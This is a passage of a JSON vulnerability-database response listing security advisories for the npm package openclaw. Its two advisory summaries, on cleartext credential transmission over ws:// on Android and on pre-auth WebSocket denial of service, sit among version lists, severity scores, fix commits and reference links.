nerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-22181","GHSA-8mvx-p2r9-r375"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-34hg-6fw2-wfax"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89946?format=json","vulnerability_id":"VCID-356u-h788-pkgt","summary":"OpenClaw: Android accepted cleartext remote gateway endpoints and sent stored credentials over ws://\n## Summary\n\nBefore OpenClaw 2026.4.2, Android accepted non-loopback cleartext `ws://` gateway endpoints and would send stored gateway credentials over that connection. Discovery beacons or setup codes could therefore steer the client onto a cleartext remote endpoint.\n\n## Impact\n\nA user who followed a forged discovery result or scanned a crafted setup code could disclose stored gateway credentials to an attacker-controlled endpoint in plaintext. This was a transport-security bug in the Android gateway client.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `a941a4fef9bc43b2973c92d0dcff5b8a426210c5` — require TLS for remote Android gateway endpoints\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @zsxsoft for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40045","reference_id":"","reference_type":"","scores":[{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00423","published_at":"2026-06-07T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00428","published_at":"2026-06-06T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00427","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40045"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a941a4fef9bc43b2973c92d0dcff5b8a426210c5","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:37:33Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a941a4fef9bc43b2973c92d0dcff5b8a426210c5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-83f3-hh45-vfw9","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:37:33Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-83f3-hh45-vfw9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40045","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40045"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-cleartext-credential-transmission-via-unencrypted-websocket-gateway-endpoints","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:37:33Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-cleartext-credential-transmission-via-unencrypted-websocket-gateway-endpoints"},{"reference_url":"https://github.com/advisories/GHSA-83f3-hh45-vfw9","reference_id":"GHSA-83f3-hh45-vfw9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-83f3-hh45-vfw9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-40045","GHSA-83f3-hh45-vfw9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-356u-h788-pkgt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91523?format=json","vulnerability_id":"VCID-37ep-9smd-zuh9","summary":"OpenClaw: Gateway WebSocket Denial of Service via unbounded pre-auth upgrades\n## Summary\n\nThe gateway accepted unbounded concurrent unauthenticated WebSocket upgrades before allocating them to an authenticated session budget.\n\n## Impact\n\nAn unauthenticated network attacker could consume socket and worker capacity and disrupt WebSocket availability for legitimate clients.\n\n## Affected Component\n\n`src/gateway/server-http.ts, src/gateway/server/preauth-connection-budget.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `cb5f7e201f` (`gateway: cap concurrent pre-auth websocket upgrades`).\n\nDiscovered by：Topsec AlphaLab (wang dong)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41399","reference_id":"","reference_type":"","scores":[{"value":"0.00102","scoring_system":"epss","scoring_elements":"0.27671","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00102","scoring_system":"epss","scoring_elements":"0.27584","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00102","scoring_system":"epss","scoring_elements":"0.27621","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41399"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/cb5f7e201f3f86ad70e199ef850e636b4cc457ba","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/cb5f7e201f3f86ad70e199ef850e636b4cc457ba"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f44p-c7w9-7xr7","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f44p-c7w9-7xr7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41399","reference_id":"CVE-2026-41399","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41399"},{"reference_url":"https://github.com/advisories/GHSA-f44p-c7w9-7xr7","reference_id":"GHSA-f44p-c7w9-7xr7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f44p-c7w9-7xr7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VC